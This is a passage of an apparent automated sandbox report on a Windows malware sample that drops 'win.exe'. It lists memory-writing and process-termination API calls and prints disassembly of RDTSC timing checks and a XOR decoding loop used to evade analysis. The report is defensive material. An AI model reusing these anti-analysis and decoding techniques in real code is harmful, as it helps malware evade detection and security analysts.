            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1402 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1430 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2C24
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1421 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0C4C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1C7E NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2C8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1484 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F44FF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0CEC TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2CE0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4554 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0D40 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8DBB NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0DB4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F45F2 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0DE4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40BF8 NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B486C3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40703 EnumWindows,NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B412A4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41286 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42AF4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B412E0 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42AC0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41210 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42A50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42A5D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41259 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B413B4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42B84
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B413EC TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42BD4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42B34
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41331 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4131B TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4135C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41348 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4109C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44880 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44834 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4101C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41078 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B449FC NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4113F TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41124 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44907 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44970 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41163 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44698 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B446E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4463C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40E24 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40E70 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40FB8 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B447DA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4473C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B48726 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40F04 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40F74 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40F50 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41484 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42C8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B444FF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42CE0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40CEC TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41430 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42C24
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41421 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41402 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41C7E NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40C4C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40DB4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B48DBB NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B445F2 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40DE4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44554 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40D40 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0BF8 NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A86C3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0703 EnumWindows,NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1210 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1259 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2A5D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2A50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1286 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A12A4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2AC0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A12E0 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2AF4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A131B TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1331 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2B34
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1348 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A135C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2B84
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A13B4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2BD4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A13EC TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A101C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4834 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1078 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4880 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A109C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4907 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1124 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A113F TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1163 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4970 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A49FC NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0E24 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A463C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0E70 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4698 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A46E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0F04 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A8726 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A473C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0F50 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0F74 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0FB8 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A47DA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1402 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1421 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2C24
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1430 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0C4C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1C7E NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2C8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1484 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0CEC TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2CE0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A44FF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0D40 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4554 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A8DBB NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0DB4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0DE4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A45F2 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560BF8 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005686C3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561078
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_0056101C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00564834
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_0056109C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00564880
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00564970
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561163
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00564907
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_0056113F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561124
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005649FC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562A50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562A5D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561259
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562AC0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562AF4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005612E0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005612A4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_0056135C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_0056131B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562B34
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562BD4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005613EC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562B84
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005613B4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560C4C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561C7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561430
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562C24
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005644FF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562CE0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560CEC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561484
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562C8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00564554
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560D40
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005645F2
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560DE4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_0056158E NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560DB4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005615BC NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00568DBB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561670 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560E70
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561604 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_0056463C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560E24
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005646E0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00564698
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560F74
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560F04
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_0056473C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00568726
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005647DA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560FB8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560BF8 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005686C3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561078
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056101C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564834
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056109C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564880
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564970
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561163
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564907
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056113F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561124
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005649FC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562A50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562A5D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561259
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562AC0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562AF4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005612E0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005612A4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056135C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056131B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562B34
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562BD4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005613EC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562B84
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005613B4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560C4C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561C7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561430
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562C24
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005644FF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562CE0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560CEC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561484
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562C8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564554
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560D40
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005645F2
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560DE4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056158E NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560DB4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005615BC NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568DBB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561670 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560E70
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561604 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056463C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560E24
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005646E0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564698
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560F74
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560F04
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056473C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568726
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005647DA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560FB8
            Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A6004 second address: 00000000020A6004 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A8DD5 second address: 00000000020A8DD5 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A5EBF second address: 00000000020A5EBF instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A7A03 second address: 00000000020A7A03 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F8D48A28187h 0x0000000f push dword ptr [esp+04h] 0x00000013 jmp 00007F8D48A28212h 0x00000015 cmp al, cl 0x00000017 call 00007F8D48A2864Ch 0x0000001c cmp cl, bl 0x0000001e mov ebx, dword ptr [esp+04h] 0x00000022 xor ecx, ecx 0x00000024 test ecx, DBADF924h 0x0000002a add ecx, 02h 0x0000002d cmp word ptr [ebx+ecx], 0000h 0x00000032 jne 00007F8D48A281F8h 0x00000034 add ecx, 02h 0x00000037 cmp word ptr [ebx+ecx], 0000h 0x0000003c jne 00007F8D48A281F8h 0x0000003e add ecx, 02h 0x00000041 cmp word ptr [ebx+ecx], 0000h 0x00000046 jne 00007F8D48A281F8h 0x00000048 add ecx, 02h 0x0000004b cmp word ptr [ebx+ecx], 0000h 0x00000050 jne 00007F8D48A281F8h 0x00000052 add ecx, 02h 0x00000055 cmp word ptr [ebx+ecx], 0000h 0x0000005a jne 00007F8D48A281F8h 0x0000005c add ecx, 02h 0x0000005f cmp word ptr [ebx+ecx], 0000h 0x00000064 jne 00007F8D48A281F8h 0x00000066 add ecx, 02h 0x00000069 cmp word ptr [ebx+ecx], 0000h 0x0000006e jne 00007F8D48A281F8h 0x00000070 test dx, dx 0x00000073 retn 0004h 0x00000076 jmp 00007F8D48A28212h 0x00000078 cmp dl, cl 0x0000007a sub ecx, 02h 0x0000007d add eax, 02h 0x00000080 jmp 00007F8D48A28216h 0x00000082 cmp ax, 0000C33Eh 0x00000086 mov bx, word ptr [eax+ecx] 0x0000008a mov dx, word ptr [esi+ecx] 0x0000008e jmp 00007F8D48A28212h 0x00000090 pushad 0x00000091 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A59EB second address: 00000000020A59EB instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A559F second address: 00000000020A559F instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 0000000000561732 second address: 0000000000561732 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [eax+ecx-01h], 0000005Eh 0x0000000f cmp cx, dx 0x00000012 xor byte ptr [eax+ecx-01h], 00000026h 0x00000017 xor byte ptr [eax+ecx-01h], 00000076h 0x0000001c cmp bl, 0000005Bh 0x0000001f add byte ptr [eax+ecx-01h], FFFFFFF2h 0x00000024 dec ecx 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007F8D48A281D7h 0x0000002a pushad 0x0000002b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F6004 second address: 00000000021F6004 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B46004 second address: 0000000002B46004 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A6004 second address: 00000000020A6004 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F8DD5 second address: 00000000021F8DD5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F5EBF second address: 00000000021F5EBF instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F7A03 second address: 00000000021F7A03 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F8D48A28187h 0x0000000f push dword ptr [esp+04h] 0x00000013 jmp 00007F8D48A28212h 0x00000015 cmp al, cl 0x00000017 call 00007F8D48A2864Ch 0x0000001c cmp cl, bl 0x0000001e mov ebx, dword ptr [esp+04h] 0x00000022 xor ecx, ecx 0x00000024 test ecx, DBADF924h 0x0000002a add ecx, 02h 0x0000002d cmp word ptr [ebx+ecx], 0000h 0x00000032 jne 00007F8D48A281F8h 0x00000034 add ecx, 02h 0x00000037 cmp word ptr [ebx+ecx], 0000h 0x0000003c jne 00007F8D48A281F8h 0x0000003e add ecx, 02h 0x00000041 cmp word ptr [ebx+ecx], 0000h 0x00000046 jne 00007F8D48A281F8h 0x00000048 add ecx, 02h 0x0000004b cmp word ptr [ebx+ecx], 0000h 0x00000050 jne 00007F8D48A281F8h 0x00000052 add ecx, 02h 0x00000055 cmp word ptr [ebx+ecx], 0000h 0x0000005a jne 00007F8D48A281F8h 0x0000005c add ecx, 02h 0x0000005f cmp word ptr [ebx+ecx], 0000h 0x00000064 jne 00007F8D48A281F8h 0x00000066 add ecx, 02h 0x00000069 cmp word ptr [ebx+ecx], 0000h 0x0000006e jne 00007F8D48A281F8h 0x00000070 test dx, dx 0x00000073 retn 0004h 0x00000076 jmp 00007F8D48A28212h 0x00000078 cmp dl, cl 0x0000007a sub ecx, 02h 0x0000007d add eax, 02h 0x00000080 jmp 00007F8D48A28216h 0x00000082 cmp ax, 0000C33Eh 0x00000086 mov bx, word ptr [eax+ecx] 0x0000008a mov dx, word ptr [esi+ecx] 0x0000008e jmp 00007F8D48A28212h 0x00000090 pushad 0x00000091 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F59EB second address: 00000000021F59EB instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F559F second address: 00000000021F559F instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B48DD5 second address: 0000000002B48DD5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B45EBF second address: 0000000002B45EBF instructions:
